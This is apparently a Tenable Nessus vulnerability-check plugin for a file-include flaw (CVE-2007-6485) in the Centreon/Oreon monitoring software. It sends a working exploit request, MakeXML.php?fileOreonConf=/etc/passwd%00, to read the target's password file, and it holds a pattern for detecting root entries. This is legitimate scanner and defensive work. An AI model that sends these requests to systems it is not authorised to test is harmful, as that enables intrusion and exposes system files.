#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP application that is prone to
multiple remote file include attacks. 

Description :

The remote host is running Centreon or Oreon, a web-based network
supervision program based on Nagios. 

The version of Centreon / Oreon installed on the remote host fails to
sanitize user-supplied input to the 'fileOreonConf' parameter of the
'MakeXML.php' and 'MakeXML4statusCounter.php' scripts before using it
to include PHP code.  Regardless of PHP's 'register_globals' setting,
an unauthenticated remote attacker may be able to exploit these issues
to view arbitrary files on the remote host or to execute arbitrary PHP
code, possibly taken from third-party hosts. 

See also :

http://www.milw0rm.com/exploits/4735

Solution :

Unknown at this time. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(29722);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-6485");
  script_bugtraq_id(26883);
  script_xref(name:"OSVDB", value:"39226");
  script_xref(name:"OSVDB", value:"39227");

  script_name(english:"Centreon fileOreonConf Parameter File Include Vulnerabilities");
  script_summary(english:"Tries to read a local file with Centreon");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


file = "/etc/passwd";
if (thorough_tests) 
{
  exploits = make_list(
    string("MakeXML.php?fileOreonConf=", file, "%00"),
    string("MakeXML4statusCounter.php?fileOreonConf=", file, "%00")
  );
}
else 
{
  exploits = make_list(
    string("MakeXML.php?fileOreonConf=", file, "%00")
  );
}


# Loop through directories.
if (thorough_tests) dirs = make_list("/centreon", "/oreon", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  foreach exploit (exploits)
  {
    # Try to retrieve a local file.
    req = http_get(
      item:string(dir, "/include/monitoring/engine/", exploit), 
      port:port
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # There's a problem if...
    if (
      # there's an entry for root or...
      egrep(pattern:"root:.*:0:[01]:", string:res) ||
      # we get an error because magic_quotes was enabled or...
      string("main(", file, "\\0www/oreon.conf.php): failed to open stream") >< res ||
      # we get an error claiming the file doesn't exist or...
      string("main(", file, "): failed to open stream: No such file") >< res ||
      # we get an error about open_basedir restriction.
      string("open_basedir restriction in effect. File(", file) >< res
    )
    {
      if (egrep(string:res, pattern:"root:.*:0:[01]:"))
      {
        contents = res - strstr(res, 'Connecting problems with oreon database');
      }
      else contents = "";

      if (contents)
      {
        report = string(
          desc,
          "\n\n",
          "Plugin output :\n",
          "\n",
          "Here are the contents of the file '/etc/passwd' that Nessus\n",
          "was able to read from the remote host :\n",
          "\n",
          contents
        );
      }
      else report = desc;

      security_hole(port:port, data:report);
      exit(0);
    }
  }
}
